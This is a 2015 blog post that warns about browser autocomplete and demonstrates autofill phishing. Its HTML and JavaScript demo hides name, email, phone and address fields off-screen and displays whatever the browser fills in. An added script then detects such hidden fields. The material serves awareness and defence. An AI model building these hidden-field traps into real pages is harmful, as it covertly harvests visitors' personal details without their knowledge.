February 6, 2015 · Front-end Code Hack

Careful with browser autocomplete, someone might steal your details

I've stumbled across a YouTube video by WhiteHat Security. He shows a very easy way to steal visitor details when they use autocomplete. For me, it's pretty scary how easy it is. Although it's very rare for me to use autocomplete, I've used it on one or two occasions. I will try to avoid using it from now on and I suggest you do the same.

OK, let's try the technique in the video. I've written some sample code to play around with. Try it in a few browsers to see how easily someone can steal your details with autocomplete. Don't worry, the example below doesn't save any details that you've entered, so feel free to try it. :)

Let's say you are visiting a website that asks you to enter your name.

Please enter your name:

Instead of just a name, if you were using autocomplete, here are some details that the website can get from you:

Enter field name above with autocomplete.



...and here's the code:

<form id="form" name="form">
  Enter your name: <input type="text" name="name"><br>
  <!-- Positioned far off-screen: the visitor never sees these fields,
       but autocomplete can still fill them in. -->
  <div style="position: absolute; left:-999em;">
    <input type="text" name="firstname">
    <input type="text" name="lastname">
    <input type="text" name="email">
    <input type="text" name="jobtitle">
    <input type="text" name="organization">
    <input type="text" name="phone">
    <input type="text" name="street">
    <input type="text" name="city">
    <input type="text" name="state">
    <input type="text" name="country">
    <input type="text" name="postalcode">
  </div>
</form>
<hr>
<pre id="result"></pre>
<script type="text/javascript">
// Run show() whenever the visible "name" field changes.
document.form.name.addEventListener('change', show);
var elements = document.form.elements;
var result = document.getElementById('result');
function show(){
    var output = '';
    // Wait a second so the browser has finished filling in the other fields.
    setTimeout(function(){
        for(var i=0; i<elements.length; i++){
            // List every field that now holds a value, hidden ones included.
            if(elements[i].value){
                output += elements[i].name + ': ' + elements[i].value + '\n';
            }
        }
        result.innerText = output;
    }, 1000);
}
</script>
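Seen from the defending side, the same hidden-field trick can be spotted by looking for inputs that sit off-screen yet carry profile-style names. The following is an added example, not part of the original post; the function names, the name pattern and the sample descriptors are assumptions made for illustration.

```javascript
// Added example: flag form fields the user cannot see but that carry profile-style names.
// The name pattern is an assumption modelled on the field names in the demo form.
const PROFILE_HINT = /name|mail|phone|tel|street|address|city|state|country|postal|zip|organization|title/i;

// True when a field is invisible, collapsed, or placed where scrolling cannot reach it.
function isHiddenFromUser(f) {
  const s = f.style, r = f.rect;
  if (s.display === 'none' || s.visibility === 'hidden') return true;
  if (parseFloat(s.opacity) === 0) return true;
  if (r.width < 2 || r.height < 2) return true;   // collapsed, or inside a display:none parent
  return r.right <= 0 || r.bottom <= 0;           // left of or above the document origin
}

// Returns the names of hidden fields whose name/autocomplete hint suggests profile data.
function findAutofillTraps(fields) {
  return fields
    .filter(f => f.type !== 'hidden')             // ordinary type=hidden plumbing is skipped
    .filter(f => PROFILE_HINT.test(f.name + ' ' + f.autocomplete))
    .filter(f => isHiddenFromUser(f))
    .map(f => f.name);
}

// Browser-only helper: turn a live element into the plain descriptor used above.
// Opacity set on a parent element is not inspected here.
function describeField(el) {
  const r = el.getBoundingClientRect(), s = getComputedStyle(el);
  return {
    name: el.name, type: el.type, autocomplete: el.getAttribute('autocomplete') || '',
    style: { display: s.display, visibility: s.visibility, opacity: s.opacity },
    rect: { right: r.right + window.scrollX, bottom: r.bottom + window.scrollY,
            width: r.width, height: r.height },
  };
}

// Constructed sample mirroring the demo form: one visible field, two pushed off-screen.
const shown = { display: 'inline-block', visibility: 'visible', opacity: '1' };
const offscreen = { right: -15800, bottom: 40, width: 180, height: 20 };
const SAMPLE_FIELDS = [
  { name: 'name', type: 'text', autocomplete: '', style: shown,
    rect: { right: 300, bottom: 40, width: 180, height: 20 } },
  { name: 'email', type: 'text', autocomplete: '', style: shown, rect: offscreen },
  { name: 'phone', type: 'text', autocomplete: '', style: shown, rect: offscreen },
  { name: 'csrf_token', type: 'hidden', autocomplete: '', style: shown,
    rect: { right: 0, bottom: 0, width: 0, height: 0 } },
];

// In a browser console this inspects the current page; elsewhere it uses the sample.
const inBrowser = typeof document !== 'undefined';
const fields = inBrowser
  ? Array.from(document.querySelectorAll('input, select, textarea')).map(describeField)
  : SAMPLE_FIELDS;
console.log('Hidden autofill candidates:', findAutofillTraps(fields));
```

A non-empty result on a page that visibly asks for a single field is the signal to stop before letting the browser fill the form.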